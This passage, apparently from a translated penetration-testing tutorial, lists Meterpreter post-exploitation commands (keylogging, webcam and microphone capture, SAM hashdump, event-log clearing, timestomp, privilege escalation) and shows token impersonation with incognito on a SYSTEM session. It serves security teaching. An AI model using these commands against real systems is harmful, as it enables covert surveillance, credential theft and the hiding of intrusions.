disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
guid Get the session GUID
help Help menu
info Displays information about a Post module
irb Open an interactive Ruby shell on the current session
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
migrate Migrate the server to another process
pivot Manage pivot listeners
pry Open the Pry debugger on the current session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
secure (Re)Negotiate TLV packet encryption on the session
sessions Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session.
transport Change the current transport mechanism
use Deprecated alias for "load"
uuid Get the UUID for the current session
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
cp Copy source to destination
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lls List local files
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
show_mount List all mount points/logical drives
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
arp Display the host ARP cache
getproxy Display the current proxy configuration
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connections
portfwd Forward a local port to a remote service
resolve Resolve a set of host names on the target
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getsid Get the SID of the user that the server is running as
getuid Get the user that the server is running as
kill Terminate a process
localtime Displays the target system's local date and time
pgrep Filter processes by name
pkill Terminate processes by name
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
suspend Suspends or resumes a list of processes
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyboard_send Send keystrokes
keyevent Send key events
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
mouse Send mouse events
screenshare Watch the remote user's desktop in real time
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Stdapi: Audio Output Commands
=============================
Command Description
------- -----------
play play a waveform audio file (.wav) on the target system
Priv: Elevate Commands
======================
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE attributes
Espia Commands
==============
Command Description
------- -----------
screengrab Attempt to grab screen shot from process's active desktop
meterpreter > screengrab
Screenshot saved to: /root/swNERpKa.jpeg
Open the screenshot the same way:
eog /root/swNERpKa.jpeg
Token impersonation
Impersonating a token lets you act as another user on the network. A token contains the security information of a logon session, such as the user's identity, groups and privileges. When a user logs on to Windows, they are given an access token as part of their authenticated session. For example, an intruder may need to act as a domain administrator for a particular task; with that token, they can impersonate the domain administrator to do it.
Concepts:
- sessions (created when a terminal logs on)
- window station (created for every process)
- desktop (the familiar desktop)
- logon sessions (different accounts produce different sessions, representing each account's privileges)
Token overview:
A token is associated with a process; when a process is created it is assigned a token according to its logon session,
containing the process's user account, group and privilege information.
Each user logon creates a logon session and is assigned a corresponding token.
When accessing a resource, the token is presented for authentication, similar to a web cookie.
Delegate Token: interactive logon
Impersonate Token: non-interactive logon session
incognito:
A standalone tool, integrated into the msf meterpreter
Steals tokens to pose as a legitimate user without needing the account's password
Used for privilege escalation in domain environments, across multiple operating systems
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > use incognito
Loading extension incognito...Success.
meterpreter > ?
meterpreter > list_tokens -h
Usage: list_tokens <list_order_option>
Lists all accessible tokens and their privilege level
OPTIONS:
-g List tokens by unique groupname
-u List tokens by unique username
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
WORK-PC\Administrator
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON